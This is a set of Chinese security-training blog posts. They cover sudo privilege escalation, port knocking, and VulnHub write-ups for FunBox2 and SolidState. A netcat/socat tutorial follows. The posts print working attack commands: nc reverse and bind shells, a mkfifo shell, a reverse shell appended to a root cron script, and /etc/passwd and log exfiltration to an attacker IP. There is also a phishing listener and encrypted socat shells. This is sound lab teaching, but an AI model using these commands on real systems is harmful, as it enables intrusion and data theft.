安全渗透：寻找配置不当的 sudo 规则以提升权限。
故障排查：确认用户是否有权执行特定命令。

命令输出解析

运行命令：

1sudo -l

典型输出示例：

1Matching Defaults entries for user1 on host:
2 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
3
4User user1 may run the following commands on host:
5 (root) NOPASSWD: /usr/bin/apt
6 (admin) PASSWD: /usr/bin/systemctl restart nginx

(root): 允许以 root 身份运行命令。
NOPASSWD: 执行该命令 无需密码。
PASSWD: 执行该命令 需要密码。

安全风险示例

场景 1：无密码执行特权命令

1User alice may run the following commands:
2 (ALL) NOPASSWD: /usr/bin/vim /etc/sudoers

攻击方法：
通过 sudo vim /etc/sudoers 直接修改权限配置，添加提权规则。

场景 2：滥用可执行程序

1User bob may run the following commands:
2 (root) NOPASSWD: /usr/bin/python3 /scripts/*.py

攻击方法：
若可写入 /scripts/ 目录，替换恶意脚本并执行 sudo python3 /scripts/exploit.py。

防御建议

最小权限原则
- 仅授予必要的命令权限，避免使用 ALL 或通配符（*）。
- 示例：user1 ALL=(root) /usr/bin/apt update（仅允许更新软件包）。
密码验证
- 敏感操作强制密码验证：PASSWD: /usr/bin/systemctl *
审计配置
- 定期检查 /etc/sudoers 文件及 /etc/sudoers.d/ 目录：
```
1sudo visudo # 安全编辑配置文件
```

操作演示

查看当前用户权限：
```
1sudo -l
```
检查其他用户权限（需 root 权限）：
```
1sudo -l -U username
```

总结

sudo -l 是权限管理和渗透测试中的关键命令：

对管理员：确保权限配置安全，避免过度授权。
对攻击者：快速定位提权路径（如无密码执行 apt、find、vim 等）。

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

补充知识点：敲门

一、端口敲门（Port Knocking）原理 通过按特定顺序访问一组预先定义的关闭的端口，触发服务器上的 knockd 服务动态修改防火墙规则（如 iptables），从而临时开放目标服务端口（如SSH的22端口）。

二、使用 nc 命令触发敲门 1. 基础命令 假设敲门顺序为 1000 -> 2000 -> 3000（TCP协议）：

1nc -v -w 1 target_ip 1000 # 敲门步骤1
2nc -v -w 1 target_ip 2000 # 敲门步骤2
3nc -v -w 1 target_ip 3000 # 敲门步骤3

2. 使用 UDP 协议敲门 如果敲门端口使用 UDP：

1nc -v -u -w 1 target_ip 1000 # UDP敲门

3. 一键触发多端口 通过 && 连接多个命令（按顺序执行）：

1nc -zv target_ip 1000 && nc -zv target_ip 2000 && nc -zv target_ip 3000

4. IPv6 环境

1nc -zv -6 target_ipv6 1000

参数说明

-v：显示详细输出（可选）
-z：只发送探测包，不传输数据
-w 1：超时1秒
-u：使用UDP协议

三、类似功能的替代命令 1. 使用 curl（HTTP模拟） 如果敲门服务监听HTTP端口（非标准用法）：

1curl http://target_ip:1000 # 模拟敲门步骤

2. 使用 nmap 发送探测包

1nmap -Pn --host-timeout 100 --max-retries 0 -p 1000,2000,3000 target_ip

3. 使用 telnet

1telnet target_ip 1000 # 敲门步骤（需手动关闭连接）

4. 使用 /dev/tcp（Bash内置）

1timeout 1 bash -c "echo > /dev/tcp/target_ip/1000" # 敲门步骤1

5. 专用工具 hping3 发送自定义TCP/UDP包：

1hping3 -S -p 1000 -c 1 target_ip # SYN包敲门

6. 使用 socat

1socat - TCP:target_ip:1000 # 敲门步骤

四、knockd 配置示例 1. /etc/knockd.conf 配置文件

 1[options]
 2 logfile = /var/log/knockd.log
 3
 4[openSSH]
 5 sequence = 1000:tcp,2000:udp,3000:tcp # 敲门顺序
 6 seq_timeout = 10 # 超时时间（秒）
 7 command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT # 开门规则
 8 tcpflags = syn # 仅响应SYN包
 9
10[closeSSH]
11 sequence = 4000,5000,6000 # 关闭SSH的敲门顺序
12 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT

2. 启动 knockd

1systemctl start knockd # 使用systemd

五、替代工具推荐 1. fwknop (Single Packet Authorization)

更安全的替代方案，使用单包授权（加密+HMAC验证）
安装：apt install fwknop-server
客户端命令：

1fwknop -A tcp/22 -D target_ip --key-base64 "加密密钥"

2. 自定义脚本 使用 tcpdump 或 tshark 监听特定端口序列，触发防火墙规则变更。

六、注意事项

防火墙规则：确保服务器上的防火墙（如 iptables/nftables）默认阻止目标端口。
超时设置：knockd 的 seq_timeout 需合理配置，避免敲门失败。
加密建议：普通端口敲门（无加密）可能被嗅探，建议结合 fwknop 使用加密。
日志监控：检查 /var/log/knockd.log 调试敲门过程。
随机化端口顺序：避免使用固定顺序的端口，防止被暴力破解。

七、总结

基础方案：nc + knockd
安全增强：fwknop（推荐用于生产环境）
快速测试：nmap 或 /dev/tcp 模拟敲门

根据你的需求选择工具，优先考虑加密方案保护敏感服务！

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

补充知识点：history怎么不见了

问题解析 你提到的 .bash_history -> /dev/null 是一个符号链接（Symbolic Link），它将用户的家目录下的 Bash 历史记录文件 .bash_history 指向了系统黑洞设备 /dev/null。这是导致你使用 history 命令查不到历史命令的直接原因。

详细解释

1. .bash_history 的作用

功能：Bash 终端会记录用户输入的命令，默认保存在 ~/.bash_history 文件中。
触发时机：
用户退出终端时，内存中的命令历史会写入 .bash_history。
用户登录时，Bash 会从 .bash_history 加载历史命令。

2. /dev/null 的作用

系统黑洞：任何写入 /dev/null 的数据会被直接丢弃，读取 /dev/null 会立即返回 EOF（空内容）。
效果：
当 .bash_history 被链接到 /dev/null 时：

◦ 退出终端时，历史命令会被写入 `/dev/null`（即永久丢失）。

◦ 登录终端时，Bash 尝试从 `/dev/null` 加载历史命令（得到空内容）。

3. 验证符号链接 执行以下命令检查 .bash_history 是否指向 /dev/null：

1ls -l ~/.bash_history

若输出类似：

1lrwxrwxrwx 1 user user 11 Jan 1 00:00 /home/user/.bash_history -> /dev/null

则确认符号链接存在。

为什么历史命令消失了？

原因 1：符号链接导致历史无法保存。
每次退出终端时，历史命令被写入 /dev/null 并被丢弃。
下次登录时，Bash 从 /dev/null 读取历史（得到空内容）。
原因 2：内存中的历史未被持久化。
即使当前终端会话中能看到 history 命令的输出（内存中的临时记录），退出后这些记录也不会保存。

恢复历史记录的步骤

1. 删除符号链接

1rm ~/.bash_history

2. 重建原始文件

1touch ~/.bash_history

3. 确保 Bash 配置正确 检查 ~/.bashrc 或 ~/.bash_profile 中是否包含以下配置（确保历史记录功能未被禁用）：

1# 确保以下变量未被设为 0 或空
2HISTSIZE=1000 # 内存中保存的历史命令数量
3HISTFILESIZE=2000 # 文件中保存的历史命令数量
4export HISTCONTROL=ignoredups # 可选：忽略重复命令

4. 重新加载配置

1source ~/.bashrc

防止历史记录丢失的配置 1. 锁定历史文件（只允许追加）

1chattr +a ~/.bash_history # 仅 root 可删除此文件（需 ext4 文件系统）

2. 实时写入历史（无需退出终端） 在 ~/.bashrc 中添加：

1# 实时追加命令到历史文件，而不是退出时保存
2PROMPT_COMMAND='history -a'

可能的安全隐患

操作背景：此类符号链接常见于攻击者掩盖入侵痕迹（如删除操作日志）。
建议检查：
检查系统是否被入侵：lastlog, who, /var/log/auth.log。
检查其他用户是否被篡改：ls -l /home/*/.bash_history。

总结

直接原因：.bash_history -> /dev/null 导致历史记录被丢弃。
解决方案：删除符号链接并重建文件，检查 Bash 配置。
安全建议：排查系统是否被恶意修改，加强权限控制。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day9 FunBox2、SolidState靶场WP

Mon, 14 Apr 2025 00:01:12 +0000

泷羽Sec-静安，专注网络安全与编程技术的学习与分享，探索技术细节与实际应用。声明：本公众号所分享的工具与资源，仅供学习与研究使用，严禁用于任何非法活动。后台回复“配套工具”获取本文的工具

Funbox2 靶机Funbox: Rookie

靶机下载地址：https://download.vulnhub.com/funbox/Funbox2.ova

靶机导入错误的解决办法

如果导入靶机错误，或者找不到网址，可以按如下方式修改。重启虚机，并持续按 ‘Shift’ 键，然后按e进入如下界面，修改 ro 处，如果 ro 后面还有其他设置的话，一并删除就可以，把 ro 修改成 rw signie init=/bin/bash

修改 /etc/netplan/*.yaml 文件，改网卡名字。

需修改文件/etc/network/interfaces 修改网卡为ens33

https://www.vulnhub.cn/post/vulnhub-vm-ip/

信息收集

sudo arp-scan -l 扫描发现新网段

nmap -sV 172.168.169.130 扫描端口

nmap --script=vuln -p21,22,80 172.168.169.130扫描漏洞

80端口是一个初始网页，然后再看robots.txt下提示有个logs文件。

扫描目录也没有发现什么有用的信息。这里看了别的博客，发现有人尝试了FTP和SSH的相关漏洞用msf也打不进去，目前学习就不占用时间验证了，等着二刷再试试别的办法。

FTP匿名登陆

尝试用 ftp 172.168.169.130 登录，发现可以用 anonymous 匿名登录。

用 mget *命令下载所有文件。然后查看文件。

cat welcome.msg 
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <root@%L>.

cat .@admins | base64 -d
Hi Admins,

be carefull with your keys. Find them in %yourname%.zip.
The passwords are the old ones.

Regards
root

密码爆破

提示密码在名字.zip文件里，但是这里又很多文件，解压其中一个发现要解压密码，先把压缩包转hash，然后用jonh爆hash。

zip2john anna.zip > anna.hash
john anna.hash --wordlist=../Downloads/dict/rockyou-top15000.txt

一个一个文件太麻烦了，让AI写了一个循环脚本。保存为zip2jhonhash.sh然后chmod +x zip2jhonhash.sh 最后执行，就能处理当前文件夹下的zip文件，爆破其密码。

 1#!/bin/bash
 2
 3# 定义字典路径（可根据需要修改）
 4WORDLIST="../Downloads/dict/rockyou-top15000.txt"
 5
 6# 检查必要命令是否存在
 7command -v zip2john >/dev/null 2>&1 || { echo >&2 "zip2john 未找到，请安装 John the Ripper"; exit 1; }
 8command -v john >/dev/null 2>&1 || { echo >&2 "john 未找到，请安装 John the Ripper"; exit 1; }
 9
10# 检查字典文件是否存在
11if [ ! -f "$WORDLIST" ]; then
12 echo "字典文件不存在: $WORDLIST"
13 exit 1
14fi
15
16# 计数器初始化
17total=0
18processed=0
19
20# 获取所有 ZIP 文件
21mapfile -t zip_files < <(find . -maxdepth 1 -type f -name "*.zip" -printf "%f\n")
22
23total=${#zip_files[@]}
24if [ "$total" -eq 0 ]; then
25 echo "当前目录未找到 ZIP 文件"
26 exit 0
27fi
28
29echo "发现 $total 个 ZIP 文件，开始处理..."
30
31# 主循环处理
32for zipfile in "${zip_files[@]}"; do
33 ((processed++))
34 
35 # 生成哈希文件名
36 hashfile="${zipfile%.zip}.hash"
37 
38 echo -e "\n[$processed/$total] 正在处理: $zipfile"
39 
40 # 生成哈希文件
41 if ! zip2john "$zipfile" > "$hashfile"; then
42 echo "错误：无法生成哈希文件 $hashfile"
43 continue
44 fi
45 
46 echo "生成哈希文件: $hashfile"
47 
48 # 执行破解
49 echo "启动 John 破解进程..."
50 if john --progress-every=30 --wordlist="$WORDLIST" "$hashfile"; then
51 echo -e "\n成功破解 $zipfile 的密码:"
52 john --show "$hashfile"
53 else
54 echo "未能破解 $zipfile 的密码"
55 fi
56 
57 # 清理临时文件（可选）
58 # rm -f "$hashfile"
59done
60
61echo -e "\n所有文件处理完成"

解压出来tom.zip 得到一个登录密钥。

SSH密钥登录

用ssh命令带密钥登录即可ssh tom@172.168.169.130 -i id_rsa

发现目录下有mysql历史记录，查看。

 1 cat .mysql_history
 2_HiStOrY_V2_
 3show\040databases;
 4quit
 5create\040database\040'support';
 6create\040database\040support;
 7use\040support
 8create\040table\040users;
 9show\040tables
10;
11select\040*\040from\040support
12;
13show\040tables;
14select\040*\040from\040support;
15insert\040into\040support\040(tom,\040xx11yy22!);
16quit

替换\40字符为空格，以为这里用的ascii码显示，然后发现tom的密码就是xx11yy22!。

方法一：su root提权

方法二：mysql提权

sudo mysql -u tom -p 
\! bash
echo $shell
id
cd /root
ls
cat flag.txt

SolidState靶场

靶机下载地址：https://download.vulnhub.com/solidstate/SolidState.zip

信息收集

80端口打开网页如下

扫描网站目录如下，没有什么特别的东西。

Readme.txt是作者介绍靶场的由来

回到之前的扫描结果中，除了80端口还开放了22端口，但是7.4的版本几乎没有poc能直接利用，还发现有25、110、 119端口开放似乎是搞了个JAMES的邮件系统。

 1└─$ nmap -sV 172.168.169.129 
 2Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 05:03 EDT
 3Nmap scan report for 172.168.169.129
 4Host is up (0.0033s latency).
 5Not shown: 995 closed tcp ports (reset)
 6PORT STATE SERVICE VERSION
 722/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
 825/tcp open smtp JAMES smtpd 2.3.2
 980/tcp open http Apache httpd 2.4.25 ((Debian))
10110/tcp open pop3 JAMES pop3d 2.3.2
11119/tcp open nntp JAMES nntpd (posting ok)
12MAC Address: 00:0C:29:3F:7E:60 (VMware)
13Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
14
15Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
16Nmap done: 1 IP address (1 host up) scanned in 19.92 seconds

再做一次细致的扫描 nmap -sS -sV -A -T5 -p- 172.168.169.129发现有4555端口是远程端口。

 1└─$ nmap -sS -sV -A -T5 -p- 172.168.169.129
 2Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 05:19 EDT
 3Nmap scan report for 172.168.169.129
 4Host is up (0.0017s latency).
 5Not shown: 65529 closed tcp ports (reset)
 6PORT STATE SERVICE VERSION
 722/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
 8| ssh-hostkey: 
 9| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
10| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
11|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
1225/tcp open smtp JAMES smtpd 2.3.2
13|_smtp-commands: solidstate Hello nmap.scanme.org (172.168.169.128 [172.168.169.128])
1480/tcp open http Apache httpd 2.4.25 ((Debian))
15|_http-title: Home - Solid State Security
16|_http-server-header: Apache/2.4.25 (Debian)
17110/tcp open pop3 JAMES pop3d 2.3.2
18119/tcp open nntp JAMES nntpd (posting ok)
194555/tcp open james-admin JAMES Remote Admin 2.3.2
20MAC Address: 00:0C:29:3F:7E:60 (VMware)
21Device type: general purpose
22Running: Linux 3.X|4.X
23OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
24OS details: Linux 3.2 - 4.14
25Network Distance: 1 hop
26Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
27
28TRACEROUTE
29HOP RTT ADDRESS
301 1.72 ms 172.168.169.129
31
32OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33Nmap done: 1 IP address (1 host up) scanned in 83.89 seconds

输入命令nc 172.168.169.129 4555 发现可以直接root/root进，然后输入listusers发现有几个用户名。

还能setpassword重设密码，把所有用户的密码都设为123456。然后用telnet登录邮件服务器。

1telnet 172.168.169.129 110 # 登录邮件
2user john # 登录名
3pass 123456 # 登录密码
4list # 列出信件
5retr 1 # 读第一封信

可以看到James给John发了一封邮件让他限制Mindy的权限，然后给她一个临时密码。这里能收集到的信息有：

John和James可能都是管理员，且有一定运维基础，所以他们的密码应该难以爆破和登入。
Mindy大概率是个新人，但是系统给他分配的账号可能包含一些高级权限，而Mindy目前不能完全控制平台。
John可能按照James的指示给Mindy一个密码，极有可能在John写给Mindy的邮件里。

所以我们下一步应该看Mindy的邮件。

 1user mindy
 2+OK
 3pass 123456
 4+OK Welcome mindy
 5list
 6+OK 2 1945
 71 1109
 82 836
 9.
10retr 1
11+OK Message follows
12Return-Path: <mailadmin@localhost>
13Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
14MIME-Version: 1.0
15Content-Type: text/plain; charset=us-ascii
16Content-Transfer-Encoding: 7bit
17Delivered-To: mindy@localhost
18Received: from 192.168.11.142 ([192.168.11.142])
19 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
20 for <mindy@localhost>;
21 Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
22Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
23From: mailadmin@localhost
24Subject: Welcome
25
26Dear Mindy,
27Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
28
29We are looking forward to you joining our team and your success at Solid State Security. 
30
31Respectfully,
32James
33.
34
35retr 2
36+OK Message follows
37Return-Path: <mailadmin@localhost>
38Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
39MIME-Version: 1.0
40Content-Type: text/plain; charset=us-ascii
41Content-Transfer-Encoding: 7bit
42Delivered-To: mindy@localhost
43Received: from 192.168.11.142 ([192.168.11.142])
44 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
45 for <mindy@localhost>;
46 Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
47Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
48From: mailadmin@localhost
49Subject: Your Access
50
51Dear Mindy,
52
53
54Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
55Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 
56
57username: mindy
58pass: P@55W0rd1!2@
59
60Respectfully,
61James

信息收集得到mindy的ssh登录密码是P@55W0rd1!2@

进入SSH

方法一：一句话直接进

1ssh mindy@172.168.169.131 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"
2ssh mindy@172.168.169.131 -t "bash --noprofile" # 建议用这个，能用vim

如果我们直接ssh不带参数的话，进去的是rbash，不是完整的，后期没法提权。

方法二：35513.py 直接进

搜索JAMES相关漏洞得到如下结果

1searchsploit JAMES

简单测试一下发现能连。

将payload改为如下内容，反弹shell。

nc 172.168.169.128(攻击机ip) 1234 -e /bin/bash

这里注意128是kali攻击机的ip，131是靶机的ip，中间网络断网重连过，所以网址变化过。kali攻击机本地开启监听

1nc -lvp 8000

然后打入poc后再用mindy的ssh密码链接即可。

1python2 35513.py 172.168.169.131 
2ssh mindy@172.168.169.131

得到第一段flag

1cat user.txt
2914d0a4ebc1777889b5b89a23f556fd75

提权

我们查看james相关的信息，他在opt目录下有相关信息。

1$ ps aux | grep james
2ps aux | grep james
3root 393 0.0 0.1 2332 584 ? Ss 07:56 0:00 /bin/sh /opt/james-2.3.2/bin/run.sh
4root 422 0.2 8.7 443624 44384 ? Sl 07:56 0:24 /usr/lib/jvm/java-8-openjdk-i386//bin/java -Djava.ext.dirs=/opt/james-2.3.2/lib:/opt/james-2.3.2/tools/lib -Djava.security.manager -Djava.security.policy=jar:file:/opt/james-2.3.2/bin/phoenix-loader.jar!/META-INF/java.policy -Dnetworkaddress.cache.ttl=300 -Dphoenix.home=/opt/james-2.3.2 -Djava.io.tmpdir=/opt/james-2.3.2/temp -jar /opt/james-2.3.2/bin/phoenix-loader.jar
5mindy 2520 0.0 0.1 4736 820 pts/1 S+ 10:43 0:00 grep james
6$

在/opt目录下发现一个可以利用的脚本，而且是以root的身份运行的。而使用命令find / -perm -0006 -type f ! -path "/proc/*" 2>/dev/null，查看是否存在other用户有read和write权限的脚本文件或可执行程序，并假设这些文件会被高权限用户的计划任务调用，从而通过在这些文件中写入提权代码来提权。也发现/opt/tmp.py脚本文件，这种脚本文件很大概率会被作为计划任务执行，而非手动执行。

尝试把反弹shell写到这个以root账户执行的脚本中，大概率就会弹回一个root权限的shell。要改这个py文件我们会发现vi和nano在这个丐版的sh上运行不佳，所以我们想个办法，要么把编辑好的文件传上去，要么用替换掉中间的字符或者插入命令。或者用之前可以用nano的命令进入即可修改

echo "os.system('/bin/nc -e /bin/bash 192.168.169.128 4444')" >> tmp.py

然后本机监听4444端口，等待几分钟等cortab运行这个文件。

1cat root.txt
2b4c9723a28899b1c45db281d99cc87c9

得到root的flag。

root权限下查看crontab也能看到在跑tmp.py这个文件。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day8 Kali黑客工具NetCat和Socat

Fri, 11 Apr 2025 23:13:09 +0000

泷羽Sec-静安，专注网络安全与编程技术的学习与分享，探索技术细节与实际应用。声明：本公众号所分享的工具与资源，仅供学习与研究使用，严禁用于任何非法活动。

Netcat（nc）

Netcat（nc）因其灵活的TCP/UDP通信能力，在红队渗透测试中扮演着重要角色。• Netcat下载：Windows版nc.exe可从Sysinternals Suite获取。

1. 反向Shell获取控制权

用途：绕过防火墙限制，建立隐蔽的远程控制通道。
操作步骤：

攻击端监听（接收Shell）：

1nc -lvp 4444 -e /bin/bash # 传统方法（需目标支持-e参数）

目标端连接（主动回连）：
```
1nc [攻击者IP] 4444 -e /bin/bash # 直接执行Shell
```
绕过限制技巧（无-e参数时）：
```
1mkfifo /tmp/f; nc [攻击者IP] 4444 < /tmp/f | /bin/bash > /tmp/f 2>&1
```
优势：通过命名管道实现无-e参数环境下的Shell反弹。

2. 端口扫描与监听

用途：快速探测目标开放端口或搭建临时服务。
实战命令： • 端口扫描（快速识别脆弱服务）：

1nc -zv 192.168.1.100 1-1024 # 扫描1-1024端口（-z为扫描模式，-v显示详情）

• 监听端口（捕获敏感流量）：

1nc -l -p 8080 > captured_data.log # 记录所有传入数据到文件

3. 文件传输与数据窃取

用途：内网横向移动时快速交换工具或窃取数据。
操作示例： • 单向传输：

1# 接收端（攻击机）：
2nc -l -p 1234 > stolen_data.tar.gz
3
4# 发送端（目标机）：
5nc [攻击者IP] 1234 < /etc/passwd # 发送敏感文件

• 目录批量传输（结合tar压缩）：

1# 目标机打包发送：
2tar -czf - /var/log/ | nc [攻击者IP] 1234
3
4# 攻击机接收解压：
5nc -l -p 1234 | tar -xzvf -

4. 内网穿透与端口转发

用途：突破网络边界，访问受限内网资源。
典型场景： • 正向代理（目标机可直连外网）：

1# 目标机监听内网服务：
2nc -l -p 5555 -e /bin/bash # 暴露Shell到本地5555端口
3
4# 攻击机连接：
5nc [目标机公网IP] 5555

• 反向隧道（目标机仅允许出站）：

1# 攻击机监听：
2nc -lvp 4444
3
4# 目标机建立隧道：
5nc [攻击者IP] 4444 -e "nc 192.168.10.20 3389" # 转发内网RDP服务

5. 网络欺骗与信息收集

用途：模拟服务响应或抓取敏感信息。
技巧示例： • 伪造HTTP服务（诱捕凭证）：

1# 搭建钓鱼页面：
2echo "HTTP/1.1 200 OK\nContent-Type: text/html\n\n<LoginForm>" | nc -l -p 80

• 抓取Banner信息（服务指纹识别）：

1echo "HEAD / HTTP/1.0\n\n" | nc example.com 80 # 获取Web服务器类型

Netcat实战练习：

1. 实现Kali与Windows的简单聊天

步骤说明

• Kali端监听（作为服务器）：

1nc -lvp 4444

• Windows端连接（作为客户端）：

1nc.exe [Kali_IP] 4444

注意：Windows需提前下载nc.exe工具（如从Sysinternals Suite获取）。

双向通信

• 在任意一端输入文字，另一端实时显示。 • 验证：输入Hello from Kali!，Windows端应收到消息。

2. 使用Netcat创建反向/绑定Shell

a. Kali到Windows的反向Shell

• Kali监听：

1nc -lvp 5555

• Windows触发反向Shell：

1nc.exe [Kali_IP] 5555 -e cmd.exe

b. Windows到Kali的反向Shell

• Windows监听（需管理员权限）：

1nc.exe -lvp 6666

• Kali触发反向Shell：

1nc [Windows_IP] 6666 -e /bin/bash

c. Kali绑定Shell

• Kali绑定Shell监听：

1nc -lvp 7777 -e /bin/bash

• Windows连接：

1nc.exe [Kali_IP] 7777

d. Windows绑定Shell

• Windows绑定Shell监听：

1nc.exe -lvp 8888 -e cmd.exe

• Kali连接：

1nc [Windows_IP] 8888

3. 文件传输

Kali到Windows

• Kali发送文件：

1nc -lvp 9999 < 1.txt

• Windows接收：

1nc.exe [Kali_IP] 9999 > 2.txt

Windows到Kali

• Windows发送文件：

1nc.exe -lvp 1234 < confidential.docx

• Kali接收：

1nc [Windows_IP] 1234 > downloaded.docx

4. 防火墙开启后的调整

挑战与解决方案

• 端口限制： • 问题：Windows防火墙默认阻止未授权端口（如4444）。 • 解决：使用常用端口（如80/443）或添加防火墙入站规则。 • 反向Shell绕过： • 反向Shell依赖出站连接，通常防火墙允许出站流量，因此更可靠。 • 文件传输失败：

替代方案：使用HTTP协议（Kali搭建Python HTTP服务器）：

1python3 -m http.server 8000

Windows通过浏览器或curl下载：

1curl http://[Kali_IP]:8000/file.txt -o file.txt

Socat 的用法及与 Netcat 的对比

一、Socat 的核心功能与用法

Socat（Socket CAT）是一个多协议网络工具，支持在双向数据流之间建立通道，其功能远超 Netcat（nc）。以下是其核心用法：

Socat官网：http://www.dest-unreach.org/socat/

1. 基本语法

1socat [全局选项] <地址1> [选项1] <地址2> [选项2]

• 地址类型：支持 TCP、UDP、SSL、UNIX 套接字、文件、管道、设备等。 • 常用选项：fork（多连接处理）、reuseaddr（端口复用）、creat（自动创建文件）等。

2. 典型应用场景

• 监听端口：

1socat TCP4-LISTEN:80 STDOUT # 监听 TCP 80 端口并输出到终端
2socat UDP-LISTEN:1234 - # 监听 UDP 1234 端口

• 端口转发：

1# 单连接转发
2socat TCP4-LISTEN:81 TCP4:192.168.1.1:80
3# 多连接转发（支持并发）
4socat TCP4-LISTEN:81,fork,reuseaddr TCP4:192.168.1.1:80

• 文件传输：

1# 发送文件（服务端）
2socat -u TCP-LISTEN:8080 OPEN:file.txt,creat
3# 接收文件（客户端）
4socat -u TCP:192.168.1.1:8080 OPEN:file.txt

• 加密通信：

1# SSL 加密服务端
2socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:localhost:80
3# SSL 加密客户端
4socat - OPENSSL:192.168.1.1:443

• 串口与网络互通：

1# 虚拟串口转 TCP 客户端
2socat PTY,link=/dev/ttyV1 TCP:192.168.1.1:8080

二、Socat 与 Netcat 的关键区别

1. 功能复杂度

• Netcat：
定位为“网络瑞士军刀”，核心功能是 TCP/UDP 连接的建立和简单数据传输，适合快速调试或端口扫描。

1nc -lvp 1234 # 监听端口
2nc -nv 192.168.1.1 80 # 连接目标端口

• Socat：
支持更复杂的协议（如 SSL、SOCKS）、双向通信、多路复用，且能处理文件、设备等非网络数据流。

2. 安全性

• Netcat：
无加密支持，流量明文传输，易被拦截。 • Socat：
支持 SSL/TLS 加密、chroot 沙盒隔离，适用于敏感数据传输。

3. 高级特性

• 协议支持：
Socat 支持 IPv6、UNIX 域套接字、代理转发（如 SOCKS4）等，Netcat 仅限 TCP/UDP。 • 实时监控：
Socat 可通过 -u 参数实现单向流监控（如日志收集），Netcat 需依赖外部工具。

4. 适用场景

• Netcat：
快速端口测试、简单文件传输、网络服务调试。 • Socat：
加密通信、复杂端口转发、设备与网络协议桥接（如串口转 TCP）。

socat 实战方案：

1. 使用 socat 从 Kali 传输 powercat.ps1 到 Windows 系统

操作步骤：

在 Kali 上启动文件接收监听（使用 TCP 协议）：
```
1socat TCP4-LISTEN:443,fork file:222.txt 
```
• TCP-LISTEN:443：在 443端口监听。
在 Windows 上发送文件：
```
1socat.exe TCP:<Kali_IP>:443 file:222.txt,create
```
• 替换 <Kali_IP> 为 Kali 的 IP 地址。

验证：

Windows 的当前目录会生成 222.txt 文件，可用 dir 确认，type查看。

2. 使用 socat 创建加密反向 Shell（Windows → Kali）

操作步骤：

在 Kali 上生成 SSL 证书：
```
1openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
• 合并证书和密钥：cat key.pem cert.pem > shell.pem。
在 Kali 启动加密监听：
```
1socat OPENSSL-LISTEN:5555,cert=shell.pem,verify=0,fork -
```
• verify=0：禁用证书验证（仅测试环境使用）。
在 Windows 连接加密反向 Shell：
```
1socat.exe OPENSSL:<Kali_IP>:5555,verify=0 EXEC:cmd.exe,pipes
```
• EXEC:cmd.exe,pipes：执行 cmd.exe 并处理输入输出流。

验证：

Kali 终端会接收到加密的交互式 Shell，可执行 Windows 命令。

3. 创建加密的 Bind Shell 并测试非加密连接

操作步骤：

在 Windows 上启动加密 Bind Shell：
```
1socat.exe OPENSSL-LISTEN:6666,cert=shell.pem,verify=0,fork EXEC:cmd.exe,pipes
```
• 需提前将 shell.pem 证书文件复制到 Windows 系统。
尝试从 Kali 非加密连接：
```
1socat OPENSSL:192.168.169.128:6666,verify=0 -
```
• 若未加密，连接会失败（显示 SSL 握手错误）。

结论：

加密的 Bind Shell 必须通过 SSL 协议连接，非加密连接无法工作。

4. 创建未加密的 Bind Shell 并用 Netcat 连接

操作步骤：

在 Windows 上启动未加密 Bind Shell：

1socat.exe TCP-LISTEN:7777,fork EXEC:cmd.exe,pipes

从 Kali 使用 Netcat 连接：
```
1nc -nv <Windows_IP> 7777
```
• 直接连接后，Netcat 无法正确处理交互式 Shell（命令无回显或卡死）。

解决方法：

使用 socat 替代 Netcat 连接：

1socat TCP:<Windows_IP>:7777 -

